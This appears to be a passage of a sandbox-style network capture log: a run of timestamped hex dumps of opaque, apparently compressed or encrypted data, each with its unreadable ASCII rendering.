                                                                                                        2022-09-29 12:45:35 UTC3067INData Raw: d8 cf 94 6e bb f4 76 66 f0 d4 4a 6c 38 37 f3 2f 4a c9 b3 88 09 2b a6 ca 9a 5c 2c d6 1a 98 b1 96 19 ed 72 c3 75 98 49 55 9d cf 56 a8 84 5a 04 62 39 23 11 73 98 42 75 a3 15 16 d9 22 ca 8a 5a 0b de a4 bb f3 58 80 47 a9 96 7d 18 e8 34 2a cc 73 53 37 c7 2d b7 4c bf d8 9e ef 30 38 61 0e c1 c8 2f b8 e6 8a 55 ab 53 da a1 a6 7c d3 13 d3 81 55 55 ef f5 c9 1b 47 35 5b 0a 0f 46 94 7d ea 21 f9 28 63 54 7e 0a e8 53 96 59 9b e3 38 26 86 e6 bc 22 5d 1f 4b 45 57 c8 c5 53 51 e1 43 a4 7e ea 9d d4 eb 0a 54 4b 48 49 9e a9 de 06 e6 ef a2 f1 42 84 38 60 07 f2 48 f9 2b 0e 05 c2 c0 03 0a 83 3e 27 34 8f ad 5b 15 d4 da 18 7f c6 8c 37 b4 aa 3f a2 01 8e f8 d3 4f 6e 5c 02 51 d4 44 9c 89 e5 0f dd 94 a7 08 32 13 26 c9 c0 6c 71 b5 53 64 bb f7 a5 59 59 29 99 c4 fc d5 f0 92 bf 29 cd df 79
                                                                                                        Data Ascii: nvfJl87/J+\,ruIUVZb9#sBu"ZXG}4*sS7-L08a/US|UUG5[F}!(cT~SY8&"]KEWSQC~TKHIB8`H+>'4[7?On\QD2&lqSdYY))y
                                                                                                        2022-09-29 12:45:35 UTC3083INData Raw: b7 83 6c 79 1f 94 7e 00 45 21 d6 5d 98 0a 72 49 42 00 86 6a 44 1b 1b 44 de 35 77 60 8c be d8 8b c9 bd e5 5b ce 18 01 87 e0 52 fa 78 b2 a4 46 94 93 39 98 04 1d 95 87 4f 05 05 ae 9a 28 aa 5d b5 69 b1 2b 3b 39 96 d5 16 96 ed e3 01 c9 28 76 96 aa f5 7d 0b 01 c1 f4 78 2e 56 09 c6 d7 f0 20 7a 78 83 20 0c fa 97 07 6d 83 9c 75 88 64 11 93 bd af 5f 19 f1 69 ee e8 5c 4b b5 0a aa db 1e 91 1d 78 38 6b 05 24 6f af b0 b2 21 0d 45 66 08 1d a0 53 96 9e 65 88 d4 c5 f5 7e 11 db 1a 98 41 47 6c a5 c8 2b c2 70 06 bb 71 3d 87 48 67 c1 5e 8f c4 f2 78 69 cb a5 e6 95 57 3e da 3a b6 58 86 ba 53 0a 3c 81 db 25 ae 0a 7d ec 2f ae 51 35 f5 84 2f a8 1a 22 df 84 00 87 e1 60 06 c4 52 dd fb 0b 66 d9 ef cb 9b 9a 5c 8b 6a 6b f8 c2 6a 08 7e 1c 4a a8 d3 3c 0e a4 65 99 29 10 72 90 74 49 43 f4
                                                                                                        Data Ascii: ly~E!]rIBjDD5w`[RxF9O(]i+;9(v}x.V zx mud_i\Kx8k$o!EfSe~AGl+pq=Hg^xiW>:XS<%}/Q5/"`Rf\jkj~J<e)rtIC
                                                                                                        2022-09-29 12:45:35 UTC3099INData Raw: 75 3e 14 33 80 79 82 f8 e2 ac a8 00 67 8c 1b ee 37 13 95 62 30 5d ec 5b 51 7b b4 3e 55 9a 95 0a 3e 23 dd 5f 99 15 d4 60 d7 57 fa fc b6 d7 13 9f 3d 8b 32 b5 61 80 23 00 a0 aa 81 a6 23 8d 1d f5 60 b7 1a f2 fd f2 7f fb b3 b0 8e 17 bb fd 75 6d ba 06 75 4c 75 87 7b 2f 6f 66 88 25 12 b6 d8 07 42 8c ae 33 4c 5a ac 44 a5 91 23 66 8f ad 19 66 7a 33 56 20 66 3c 59 4e 96 82 d8 0a f4 11 fe 1e 70 04 a1 44 da 50 a6 b0 6c 04 e8 28 96 32 a3 ab 24 8d 70 fe 84 14 4e c4 a3 81 16 a9 72 80 29 9a 52 07 01 e7 02 1b ad 89 17 6d 1b 07 33 f3 fd 8c df 2d d5 27 1f 8c b7 61 dd ca f0 2d 83 7a c4 3b 2a fb ee 45 d8 02 3e 13 14 be 1e 4c f3 4c d1 7a 06 ee 0d 7f 2e b0 81 c2 02 a0 03 ba ce 10 2b 9a 9b 52 ba f1 be 5f 13 49 ec 63 18 58 4b d6 8e ae e0 43 d7 be cb 94 8b 51 aa 5c 16 aa 25 85 48
                                                                                                        Data Ascii: u>3yg7b0][Q{>U>#_`W=2a##`umuLu{/of%B3LZD#ffz3V f<YNpDPl(2$pNr)Rm3-'a-z;*E>LLz.+R_IcXKCQ\%H
                                                                                                        2022-09-29 12:45:35 UTC3115INData Raw: f9 82 8a 9b 16 45 2b 5e d1 b0 46 b1 17 f3 55 ca c9 81 56 75 ca 30 25 99 43 af 3a 4b 28 28 8c 53 84 ea 74 fe 1e 3d 57 53 ac b1 43 91 e4 78 82 15 65 a5 16 8a 82 ac 13 01 cf 91 0e 96 69 23 19 61 3c 32 c1 fe 52 bd 04 d0 29 42 e7 ba 72 10 e3 8c 1a 9a 4c 3f 86 63 4a 2e 33 f6 17 f3 29 64 0d c2 b7 e6 fa 15 f0 dd b0 bd 12 5c fb 4d a3 f6 37 4a 30 6a 36 ee 06 a8 f5 27 8a 95 32 c0 76 dc 8c d5 33 0a 5d 59 2a 0f 7e d7 7e 5d 5e 7e 82 b4 66 59 e2 a3 87 0b f1 3a e1 91 f5 88 50 6f d9 f7 fb fd d9 f8 36 03 ee 0e 12 dd a2 19 2a 71 1d c1 95 46 78 fa 7a 54 0d e8 df d0 dc 74 e4 48 3c 40 72 00 99 a6 9e 5b c6 64 ea 7d 22 fa 9e b6 4e 99 ad 60 e9 70 8f 0d 5d d1 7b 93 2b a2 b7 18 ad c4 27 62 77 ca 7b 09 76 3d 12 8f 78 91 98 ec b4 60 79 f0 a6 09 5f 6f e2 a5 c6 3a 3a 03 fc 92 b3 40 29
                                                                                                        Data Ascii: E+^FUVu0%C:K((St=WSCxei#a<2R)BrL?cJ.3)d\M7J0j6'2v3]Y*~~]^~fY:Po6*qFxzTtH<@r[d}"N`p]{+'bw{v=x`y_o::@)
                                                                                                        2022-09-29 12:45:35 UTC3131INData Raw: d1 fa 5b 47 96 c6 7d 45 0b 91 b6 f2 50 85 e5 a0 66 c8 82 03 e1 09 29 eb c1 eb 68 4d f1 36 d6 8c a9 93 6d ce 9f 26 1c ed fe 74 44 fa 63 f0 64 30 c2 9f de e7 b0 47 5f 4f 4c e4 41 80 4f fe 2c 93 72 10 c9 36 73 c8 91 2e b2 13 e4 79 44 e5 f0 de 2f eb 92 58 43 8c 87 f8 48 81 c0 be f2 30 9e 0b b6 06 3f 92 8e d2 af a4 e4 f1 ec 23 8e c9 66 1a 5d 3e 10 0f e0 d5 21 b4 e6 72 4e d9 95 15 a2 59 32 9b f6 a0 57 39 f0 bc 4b cd 72 1f 40 7b 5d 43 60 f7 d1 f8 e9 fe 01 35 52 12 bd f2 88 c4 a7 1f 29 9c e1 cb b3 d1 1a 29 a7 2c f6 69 63 a5 a5 75 4e 77 d4 76 2c 3e ae 02 38 bc c6 b5 b2 f2 a0 65 8c d7 a8 db 05 eb ff 20 ab 89 7f 3f f6 88 59 ad c2 05 90 69 4f 4a 5b bc de fa 13 81 5c da d4 97 a6 5d 02 e1 d2 ca 4b 83 6f df ab 79 73 9f eb fd 00 b5 1d 5b 52 0a c1 3a c1 04 56 9d 93 f9 5e
                                                                                                        Data Ascii: [G}EPf)hM6m&tDcd0G_OLAO,r6s.yD/XCH0?#f]>!rNY2W9Kr@{]C`5R)),icuNwv,>8e ?YiOJ[\]Koys[R:V^
                                                                                                        2022-09-29 12:45:35 UTC3147INData Raw: b4 f0 ff f1 3d cb db c5 9e 30 89 90 66 66 2b 23 7b ee 31 2a 66 20 09 4a 5c a6 f2 19 b3 d3 bb 09 b0 c9 9d 08 9d 69 7e 68 2c 9b ea c9 7f d5 96 59 2e 6c 46 4c ea 4e 5c 85 13 79 87 52 f8 ea 7e b0 00 31 af 39 54 32 ab 9d 34 5c 53 02 16 ce 35 58 15 67 cb 2a 74 4c bc 83 ec 68 35 9f 9e cc 74 87 1b 80 13 3d b9 4a 38 1c 58 17 7f e6 9f 80 81 af d2 d3 49 bf f4 9d 3c bc 89 f7 36 bb 06 04 98 85 83 8e a6 2c 06 f0 ec e1 1d 26 13 6f 77 9a 5c 08 9f a6 59 5a 25 89 94 de bc 83 e0 a1 bf 83 06 b9 1c f4 ed de 36 47 9c 2f b8 d8 0c 11 dd 27 93 d9 67 1e 9e ec 6d d4 18 59 23 e7 c0 5d 6f e9 69 0f a1 39 26 02 fc 04 1e 34 2d 5e 95 f6 79 44 aa 89 f0 dc dc cd 91 2f bd ce 77 80 e2 8d e6 69 b5 fa 0e 9d 3c fe 94 12 45 83 4f 61 dc d2 dc d4 b5 e8 74 cd 8c c7 0c 69 8c f9 55 c4 d3 ad e8 3f 80
                                                                                                        Data Ascii: =0ff+#{1*f J\i~h,Y.lFLN\yR~19T24\S5Xg*tLh5t=J8XI<6,&ow\YZ%6G/'gmY#]oi9&4-^yD/wi<EOatiU?
                                                                                                        2022-09-29 12:45:35 UTC3163INData Raw: f0 cf d6 12 1d 81 eb 27 f9 34 57 09 fa 4d 2d a2 c2 98 f3 53 87 24 2e 81 df 13 3f a7 5a 38 36 d3 49 6e b4 0d 58 c6 35 17 94 e2 23 b8 90 ac 0d e9 ed fb 65 22 88 5b e3 ad 9d 2a 8c df 7f bd 91 0c 76 92 8f 57 e5 27 c7 ea 46 00 d4 1a 16 a2 03 89 60 dc bd 7a 34 b2 13 e5 e3 84 aa b8 07 10 ab 5f d3 13 5e ca 7f bb f6 61 24 db eb e4 1b 18 eb de 36 2b c7 0c ed 72 63 2e ef bd e3 b6 17 69 d7 01 95 f9 2e f1 bb cc 37 7f 5e 53 4e ee fa 58 0a 95 31 40 af 0e a5 60 44 9b cd f5 6e cb 29 a7 94 b3 95 a6 8c e5 a1 a5 11 ee d9 cb ba 0f e8 cd 7f 6b e6 62 73 33 e7 95 e7 84 48 4c 20 49 2c b0 6a 37 7a b0 cf bf a1 01 fa 46 d8 9c 55 86 41 53 ed 35 87 12 e8 94 1b 4f be de 64 bc 34 36 6d c9 74 70 e4 e8 56 ab 64 57 a2 3c 01 1f 6b 11 f6 13 e4 4d 40 c1 44 d7 2f 74 f1 09 4e 32 68 1b 8a b5 23
                                                                                                        Data Ascii: '4WM-S$.?Z86InX5#e"[*vW'F`z4_^a$6+rc.i.7^SNX1@`Dn)kbs3HL I,j7zFUAS5Od46mtpVdW<kM@D/tN2h#
                                                                                                        2022-09-29 12:45:35 UTC3179INData Raw: 89 29 d1 4b 20 ee cc 13 5c 5d 3e 24 97 b9 dc 69 ac a0 8a 23 f3 22 72 ce ba 10 c0 c6 b0 49 92 91 d6 88 c8 8d d9 ca f0 ed a7 f1 cb ea 50 9e fb 2e 63 2d bf 6b 34 c4 dd 82 75 b9 86 c2 02 6f 3e b3 47 bb 98 9a e3 d2 c4 0c a9 ab 4e 6d 49 1a 47 fe 65 fc ea e6 32 48 a4 44 0d 68 db 9e 98 60 9b 59 38 14 5c 44 e3 33 61 a9 b5 49 9a 08 5f b3 a1 09 4c 7f e1 60 16 3f fd 76 c8 be c8 5b 5e b2 e3 8d 3f e4 2a b5 4a 11 c7 0e 80 a7 34 1c 62 db ad 29 b6 97 4f 6d bd ed d0 94 7d f6 d0 60 af d6 84 86 a5 46 c9 c0 4a 8d 17 3a c1 e2 cb 18 47 d3 b6 4b 46 16 4f 9f e0 90 8c 09 9f 62 ed 1c 54 e9 c9 1e a3 ea aa 0c 98 0e af d0 04 12 9d 02 3f 39 87 b6 a6 c4 a7 0f 83 e6 f7 ae d2 a3 b0 c5 a9 28 b3 fb ed a2 47 e3 95 16 67 f8 8a 7d 2b 74 4a 3c fa b3 56 c1 c7 0b 7d 77 e9 c8 15 cd ef 3b 17 c0 4a
                                                                                                        Data Ascii: )K \]>$i#"rIP.c-k4uo>GNmIGe2HDh`Y8\D3aI_L`?v[^?*J4b)Om}`FJ:GKFObT?9(Gg}+tJ<V}w;J
                                                                                                        2022-09-29 12:45:35 UTC3189INData Raw: c0 de 44 7a 9a b3 28 aa e0 57 82 a8 ea 8c 08 51 fb 8f df 1a 51 fc 03 aa 3f 6c 90 36 bb 1e f4 5b b8 02 23 a1 b0 0d 5d 70 44 e2 6f 52 77 e7 d3 16 84 05 d3 8d f9 41 68 70 7b d6 3e 02 3c 9b 17 8e e3 ae 96 55 b9 b3 46 65 6f 26 8e e2 80 f0 da 56 d5 67 a9 8f ce fe 33 a9 9d 12 ea 2d 0f cf 69 3c 20 9a 1a 49 c5 73 cb 9e 7f 96 78 43 ef 97 74 f5 fc 59 a7 63 fb 04 60 07 8d 27 fe 09 54 fd 6c 23 23 e5 8f e8 60 b7 d0 d6 9d b9 88 b2 d3 14 0e a2 b0 ba 3c 41 fc 1c 42 0f 79 ee 64 4a 87 dd dc fa e3 f8 c8 4e 2b b8 44 c5 54 05 0f 7d 82 3f 8c ce 1f 7a b6 74 ed 20 dd 81 77 e5 fa db 19 85 4e cf cd 79 f5 b3 15 df 71 51 11 05 1f 3a fc 8c 35 a8 25 dd a1 2f 27 20 7e 0d 71 90 dd 90 9c 38 24 ad 4f 47 f9 0e af 22 ff fd 0d 1f 28 e8 23 67 da 61 6c 26 7a ad 75 ab 82 6b b8 60 15 b7 13 52 c1
                                                                                                        Data Ascii: Dz(WQQ?l6[#]pDoRwAhp{><UFeo&Vg3-i< IsxCtYc`'Tl##`<ABydJN+DT}?zt wNyqQ:5%/' ~q8$OG"(#gal&zuk`R
                                                                                                        2022-09-29 12:45:35 UTC3205INData Raw: 72 52 e6 22 3b d9 c0 d8 33 03 de 0d 30 1f 41 bf ad b0 fb 48 06 a7 3d e5 a5 80 cc be 17 f5 da e2 7a 35 0d d1 e0 a8 71 c8 c1 b0 a5 9b 7d 58 f2 55 b2 58 c1 ab 11 11 bf ef dd e0 95 89 2e 8e 74 8f 96 12 13 e4 ce 41 6a 2e 0c e6 d2 1a 39 78 b5 9e 47 b4 d9 6a e3 9c bd e5 09 b7 8c 9e c4 9c ef 2a c4 f9 eb a9 09 44 42 59 13 30 0c 0a 95 a4 a3 d3 4c 53 7e fb 3e a5 fb 71 4b a9 95 6f dc 64 1b 1a 49 c3 88 77 3e c8 0c d0 bf 81 e3 07 bc b6 79 35 c0 35 c6 67 f5 0e e9 69 7c 57 80 58 1f 0e 1e 37 ce b3 9f 61 74 4f 92 2e 86 8b ea f2 21 00 fc 98 af 4f 12 c3 a1 8b 93 85 4c f7 88 37 cf 93 fd 2a ba 23 e8 c8 03 e0 9d 2f a0 0b 94 b6 ce 0f 55 7c 2f 24 6c 9d 6a 16 69 1a 77 40 5a 92 e4 a4 2a 02 1e 73 55 4b fd e4 ab 2c 5f 3a 65 2a db 06 e1 e0 a7 67 c1 96 fc bb 01 7e 2d 18 73 98 bd dd 41
                                                                                                        Data Ascii: rR";30AH=z5q}XUX.tAj.9xGj*DBY0LS~>qKodIw>y55gi|WX7atO.!OL7*#/U|/$ljiw@Z*sUK,_:e*g~-sA
                                                                                                        2022-09-29 12:45:35 UTC3221INData Raw: 3f 24 fc 5b 9d 8c 26 07 f6 3b 79 d3 f8 06 0b d0 2a 14 4c 52 7f d0 14 43 dd 5a 53 22 3f eb 30 c8 09 29 b5 ba f8 2c b8 06 06 a1 5e 2f ab 3d a1 15 d8 ee d2 61 5c ec 43 78 26 2c 97 4d 03 1d 7a 82 79 da 2f 74 a1 8d 8c b7 89 a9 6d 03 9b 10 31 4e c9 39 f7 7d 98 f2 9a 07 00 52 a6 02 ae 44 a6 cb dd b0 91 2d 94 e6 6c 34 5c 56 b9 f8 57 ba d9 c5 e6 e8 98 5c 22 3e b4 e5 c4 3a 5b cd 35 77 b0 da 74 c2 35 4e 0f e0 0d 18 db 06 fc b2 6f 1e b0 59 4b 94 fe 4e a9 54 6d de ab be e8 fa 35 2e f5 fb fb 5a e8 f3 1c dd 2c d3 26 82 88 f9 b8 75 59 06 02 f7 7d 77 6c bd ed 1a 08 11 10 5d 70 e4 1c 73 c9 c8 57 78 41 9d b0 a0 f6 e0 8d 7a 03 ed 91 57 00 40 8c d0 e2 f4 84 f8 68 a1 5e 89 4a 9b 3a af 79 21 6f ca 70 f5 94 47 23 74 8d cc d3 e2 76 00 5d e3 79 c3 5c 8e e1 14 ed cb 44 02 0d 28 91
                                                                                                        Data Ascii: ?$[&;y*LRCZS"?0),^/=a\Cx&,Mzy/tm1N9}RD-l4\VW\">:[5wt5NoYKNTm5.Z,&uY}wl]psWxAzW@h^J:y!opG#tv]y\D(
                                                                                                        2022-09-29 12:45:35 UTC3237INData Raw: 61 d2 c2 8a 76 df 0f 0e 4d fd 27 d5 14 15 68 b0 9d c3 e8 c7 43 cb 81 a2 b8 6d 4a 9c 3d c3 29 5f f7 cb 9b 7b a1 eb b2 5e 13 3c 16 19 e8 8f da c6 2c 34 5e b5 b5 7e 98 ec 20 03 00 85 e1 65 4f ba 9e 53 24 c3 7c 33 e2 e6 11 ff 63 69 7f e3 d0 a1 62 a5 34 f2 39 f2 58 f8 6c 65 bc 19 24 86 0a 59 bc bd fe 50 61 68 2a 89 33 19 97 ae 85 60 8a b6 19 1a 81 08 4a 65 12 bc 8b fa 58 64 cf c0 f9 fa 29 a6 e7 5e 5a 21 5f d8 01 27 fe 17 60 5c cf 89 ac 6f e4 1f c6 92 d2 35 ff 75 b1 c2 09 95 6e 13 fd 41 ae f3 89 c4 88 7d 59 48 83 53 c4 e0 9b 2c cb 2b c9 9d 5b 4c 41 48 3d d4 74 f5 a0 05 e0 0e 2c b4 a5 b8 2f ce a2 6e d0 fe fe 38 87 71 6a be 76 c1 76 e0 80 5e be 4a bc f2 1b 77 29 78 38 0a d2 7d f4 6e db a4 5a fe fe 3a 95 3f b9 50 ca 87 d9 17 59 1d c3 ae 66 5b 83 2f 69 d7 16 ce 4e
                                                                                                        Data Ascii: avM'hCmJ=)_{^<,4^~ eOS$|3cib49Xle$YPah*3`JeXd)^Z!_'`\o5unA}YHS,+[LAH=t,/n8qjvv^Jw)x8}nZ:?PYf[/iN
                                                                                                        2022-09-29 12:45:35 UTC3253INData Raw: 06 2c ce 64 0c 38 c7 d9 74 aa 52 5f 44 3a 54 2a 54 c4 05 3a f8 f8 58 d3 8c f6 a6 19 91 f2 e6 44 de 62 a0 98 ec ab 4d 5d cc ad 21 41 a4 27 1e db ce a4 3e 07 e7 96 fb 8a 6f ce c2 88 d1 50 6a 2b 0d 34 17 99 25 23 f3 ee e5 86 8a 3f c8 e1 9d b5 3c 85 5e 59 1e e0 52 77 8a 51 43 e3 b0 f8 5b 24 42 88 a0 12 9a 1b fa aa bd e1 c6 a1 99 51 cc 48 5b bc 6a f0 03 9d 20 84 88 0f fb 5b 65 2b 9a 8a a1 a5 3e 16 fd 51 d6 94 51 55 6f 64 97 4d ce ad 14 9b 6e 18 a5 10 12 da 18 80 e4 55 d7 c9 ca 48 0b dd da 94 af bb 86 b1 5d 53 f0 fe 12 5f 17 91 69 02 ae 1e 93 7f 66 92 a3 d9 13 d5 30 2c 6d 03 fa a0 1b 9c 06 71 3f 41 a2 51 47 ed 46 a3 60 c2 0a bc 4e 9c bb 22 01 ce 37 a3 4c 55 04 c3 e8 39 be 81 fb a7 57 39 bd be 4d bc 35 09 fa bf 8f be b8 3c a4 28 11 52 af 97 39 40 78 ac 5c 53 ef
                                                                                                        Data Ascii: ,d8tR_D:T*T:XDbM]!A'>oPj+4%#?<^YRwQC[$BQH[j [e+>QQUodMnUH]S_if0,mq?AQGF`N"7LU9W9M5<(R9@x\S
                                                                                                        2022-09-29 12:45:35 UTC3269INData Raw: 09 58 b6 b9 37 8f 94 da 58 25 d6 02 75 71 03 6d f1 41 30 b5 e2 f9 d6 43 e4 f6 a2 c9 92 a0 a0 7d a9 83 33 68 ba fb b2 2f 7a b1 b9 e0 f8 eb d6 39 fe 78 ea 90 1f 2f 47 96 db f5 b0 bc f9 de 7a 05 cc 45 a0 50 0e 15 59 29 ea af e6 a5 1b cf 02 30 a3 8c 4e 6b 51 11 c6 69 31 a3 46 63 5c 94 f3 7f 70 89 1e de 77 51 e9 4c 54 1f 8c d6 20 e8 c8 f2 89 c3 69 f3 4c c0 4c 1c 96 92 c3 a7 95 48 1b 46 0e 7b 6a 04 71 a6 88 7a d9 42 bd 92 70 71 bb 5c 13 d9 54 d9 76 11 51 60 e1 d5 a6 d6 40 b7 9c 67 21 43 2a c2 a6 5b 94 20 84 1b a8 b7 64 db 89 b3 48 3f ae ee c6 e6 a9 3b af ea 16 40 a0 02 cf eb c7 46 4a 31 d0 a8 fa db c2 cb 67 8e 20 b7 d1 2d b3 c9 87 fb 92 9e c8 16 0d aa f9 5a dd 1c 69 ff c3 8d 94 b2 34 96 ac e6 b0 26 14 90 ee f8 26 f5 84 66 0c a4 e1 4d 38 6d 86 2f da b9 51 91 32
                                                                                                        Data Ascii: X7X%uqmA0C}3h/z9x/GzEPY)0NkQi1Fc\pwQLT iLLHF{jqzBpq\TvQ`@g!C*[ dH?;@FJ1g -Zi4&&fM8m/Q2
                                                                                                        2022-09-29 12:45:35 UTC3285INData Raw: d0 c0 1c 01 f6 7b a8 82 91 57 57 d2 c0 56 82 ee 29 90 91 2f c8 99 7d 1f c6 6d aa 6e 88 8e 56 ea ee 3c af aa fd a0 8a 46 95 c2 cf 6d 56 2d b0 01 5f d1 52 f1 29 fb f6 9d 59 a4 91 dd 1a 7e de cc 61 17 5a b4 d1 ce 4f ae 37 74 09 a3 24 71 30 ef 46 31 58 04 f2 f3 02 a2 26 9c 8d 79 1f 49 42 78 6d 81 94 e6 47 63 59 53 38 e8 dc a2 98 ba cb 6f 3e 1f 45 33 92 bf 0b 06 fc 77 0c a1 80 53 a7 99 da fb 7c d1 37 3f 90 65 c0 b3 e7 f6 91 fc 21 32 a1 97 4d 10 5b 23 a4 ff 03 d8 a1 f6 cd 00 7e c2 6a c6 9c cd e9 ec 75 a3 8b bb a1 1a ae 0a 33 29 48 29 db a8 52 50 ae 18 21 ac 69 0b 80 42 18 58 79 30 35 de 17 cd 52 ec 44 f2 54 00 75 e0 f8 6c 11 11 22 71 d5 28 85 e4 82 6a 01 5d 51 a5 a8 18 1b d3 95 df b5 f6 17 41 1a bf 3d 8b b5 f2 a4 5e 35 ae 91 09 75 8c 88 ac 46 6c cb 7e 98 43 45
                                                                                                        Data Ascii: {WWV)/}mnV<FmV-_R)Y~aZO7t$q0F1X&yIBxmGcYS8o>E3wS|7?e!2M[#~ju3)H)RP!iBXy05RDTul"q(j]QA=^5uFl~CE
                                                                                                        2022-09-29 12:45:35 UTC3301INData Raw: 96 3c fb 26 87 ea 4e 22 63 a3 a2 2a a6 c3 71 2c ce 31 24 5a 5b f3 94 6f cd d8 03 b8 e1 63 95 7f d8 6c 94 a7 09 a8 5c 3f f0 8b a7 c0 fc 8f 93 f4 e5 4e ec 44 c6 b9 22 29 e1 24 27 b8 14 88 28 3e 35 47 a7 36 a6 cd 30 ad 92 37 bd 3d d3 cc d2 2d b7 43 e2 39 03 cf 6e 16 21 a5 a0 5a b0 1e 6b c4 8a f1 94 bc fe 0e df 27 40 22 33 19 4b a4 6d bd be 64 fa f3 ac 2a e5 09 e7 c2 47 73 d9 e8 c2 41 2c 22 a8 40 79 ed 6c ce 67 ea 0e e6 0e b4 8e 78 74 62 7b 4f ed 41 c8 e1 b7 00 41 d8 6d 24 c7 32 15 d4 05 3c 60 4b 79 4a c5 97 b7 c1 40 84 3f a9 8a 46 33 97 9f 95 81 74 06 d0 4f cc 28 20 08 22 e0 68 42 cf f7 64 2a 55 bf ce c8 00 75 df 41 de b6 3b 04 44 41 48 98 76 03 2b ca f1 86 bf eb a9 33 22 d6 6a b5 21 37 40 c9 19 81 b6 11 9a 1f f1 0e 85 09 52 97 5a 17 1f a6 1d 2c 32 18 6e ba
                                                                                                        Data Ascii: <&N"c*q,1$Z[ocl\?ND")$'(>5G607=-C9n!Zk'@"3Kmd*GsA,"@ylgxtb{OAAm$2<`KyJ@?F3tO( "hBd*UuA;DAHv+3"j!7@RZ,2n
                                                                                                        2022-09-29 12:45:35 UTC3317INData Raw: d8 4a 2f b3 3b 46 ce f1 aa ee 0b 8e b5 cb 03 bd 5d 8e a5 27 b2 e4 d8 ec 9d d0 3f 1e e2 02 f9 a9 ab 38 5c d1 0e ad 38 94 c7 52 53 c1 a8 73 f7 60 6b 25 9c 95 0d e5 fa 72 48 e4 33 6f 87 ce 75 2d 46 ed 93 7a 83 a9 24 48 ca 5f 70 67 b7 ed 82 2a d8 09 43 a4 91 b9 91 09 ee 4e 5b 91 fe fd e8 ff d2 77 bd 3f 50 cd 69 28 03 45 60 20 da 13 9a aa 0f 5a 0a 27 de b0 2c 0a fa a5 aa 66 51 d2 6f e7 c1 5b e5 ee 74 d1 03 5b 03 78 85 d7 9a ba e1 6b c7 05 5a eb 4d 87 04 95 c3 4b c9 10 98 e1 f0 2d e6 5e 93 53 ce 70 a0 8e c9 9c 29 d6 6a 16 e1 b1 01 22 3f 23 e3 4c 0a 9f 29 ff 45 52 bf a7 6c 78 d5 fa 09 6d fc 7e f5 01 cb bb c2 4d 3c 57 2c 51 fb 0a 04 45 f4 f4 08 87 1b b5 60 b1 4b 5e 5a 4a e2 32 6e cb b2 6c 2f 13 d8 f6 17 0e 8c aa e5 24 94 a4 45 64 fc 49 2a 4f 30 27 91 6a 33 0c d3
                                                                                                        Data Ascii: J/;F]'?8\8RSs`k%rH3ou-Fz$H_pg*CN[w?Pi(E` Z',fQo[t[xkZMK-^Sp)j"?#L)ERlxm~M<W,QE`K^ZJ2nl/$EdI*O0'j3
                                                                                                        2022-09-29 12:45:35 UTC3333INData Raw: b5 59 a7 80 6d 42 00 4e d3 5b 12 35 ec 94 e4 96 84 ae fb 72 a5 5e 8c 9e 9f 5d 1b e5 69 b6 e1 f9 4e 60 e0 fa d0 9b a5 36 ef a2 85 55 20 8b e8 a0 b8 f9 4f 5a a4 f3 8a fc a9 6a cb ed ed 3c 9e e5 b6 27 95 c9 2d f5 6e ea d8 f0 3e 34 d7 8b 80 46 b6 36 34 89 89 e9 54 bc 2e 95 e0 b0 63 56 1e d6 db 26 2e 67 12 33 4a 74 d0 ce cc de c7 61 7f b1 01 7b fe 93 08 1c 02 6e 92 49 e4 ec f5 3f b2 db 66 ca 71 93 48 c5 ca 37 7c 65 48 5b c2 fb 83 1d 1a 7c 51 7a f3 5d 47 41 e1 8d 50 1e 95 48 d3 ac 96 c0 4e 85 91 49 98 8f db 48 f8 61 48 e5 3a 44 c8 da b1 14 43 cf fa 24 91 c7 76 0a 4b 6b 09 d0 f7 4f c5 b7 25 d1 65 67 1b 34 63 a5 1c 02 da 28 f6 05 16 0e 95 ca 7b 77 79 4b 64 8f b9 34 6a 44 3d 45 9b 5b 57 4e e6 36 48 dd c4 8f a4 fb 49 82 2a 25 48 3d 5a 47 8d 6a 29 8d 4b 11 11 85 a1
                                                                                                        Data Ascii: YmBN[5r^]iN`6U OZj<'-n>4F64T.cV&.g3Jta{nI?fqH7|eH[|Qz]GAPHNIHaH:DC$vKkO%eg4c({wyKd4jD=E[WN6HI*%H=ZGj)K
                                                                                                        2022-09-29 12:45:35 UTC3349INData Raw: ec 23 e2 ee 96 08 d7 08 f1 15 a4 26 0f 8f 9e ab 6b 9a 26 9c 77 71 80 f9 0c f9 33 d9 5e b8 31 a8 90 60 7f d9 53 1f 95 f2 00 ef 76 5a 31 f1 83 0f 6f 65 04 b5 47 90 2c 37 52 2c 4b 31 18 de a4 30 55 9d a9 d7 d3 a4 f1 d5 1c 3b bf 62 56 b9 b6 73 d2 ce f3 e2 e9 06 f0 68 2e 41 cd b0 e6 c1 d1 6e b6 b9 ea 5f 65 6e 76 da 5c 98 3b f3 68 f6 5b c4 68 a4 16 20 01 c1 12 6f 68 41 da 8a 80 ae 73 5b 9d 7f ef 10 2a ae 80 5b 84 ff 71 09 5f 6f 94 f5 b3 74 fc 1b b5 eb 81 6e d1 31 33 4d 15 06 28 9b d2 ea c6 f7 d8 d1 2f 37 31 4f c5 93 f0 fb 99 dc ce e4 a8 43 9a 73 1d a0 ea ce ff 17 3c 96 0c 16 88 94 97 41 13 a0 88 6b cc 33 67 cd 1e 54 fc 42 01 3e d9 f8 36 41 59 84 58 03 60 68 3a 07 dc 8b 88 0b b5 66 57 d7 96 51 b9 0b 33 aa e9 e8 c1 78 e2 38 92 30 bb cb 57 85 05 bf 6a 6a 2c fe 1e
                                                                                                        Data Ascii: #&k&wq3^1`SvZ1oeG,7R,K10U;bVsh.An_env\;h[h ohAs[*[q_otn13M(/71OCs<Ak3gTB>6AYX`h:fWQ3x80Wjj,
                                                                                                        2022-09-29 12:45:35 UTC3365INData Raw: da 6c 60 36 d5 c0 41 68 e1 78 fd a6 e8 35 aa 66 fb ca 6c ba 8c f9 51 0a f3 08 d2 43 60 3b bc c1 c5 7e 7f bb 05 06 3d 07 99 02 a8 d0 54 5b 1a 54 35 6b 00 30 af 8c 4e fd 08 89 27 08 11 a2 e7 b6 d9 73 13 43 c0 4f 36 91 f5 96 7c 05 1f f8 49 e3 aa 03 46 55 59 ed a1 78 4b 9b ce a5 33 9b dd 5b 67 74 d3 43 8a 1f 23 ff 38 27 ab e4 7a 82 bc ec 67 ca d8 fd 8f 9d fb 99 de b2 32 98 c6 d8 61 ef 53 dd 08 59 16 6e 30 0b 2d f7 55 cf a2 64 9e a5 62 9e 84 14 4f b5 e3 e0 82 a5 bd ad 0d 2b 3c 0b fe 96 5f 82 f0 09 ce 5f bb 8b 77 e5 00 a8 fa 22 f6 f4 f7 a1 a5 d5 3a 1d 47 e5 87 85 32 8d b6 ad 03 8c f9 8d e0 f2 20 b5 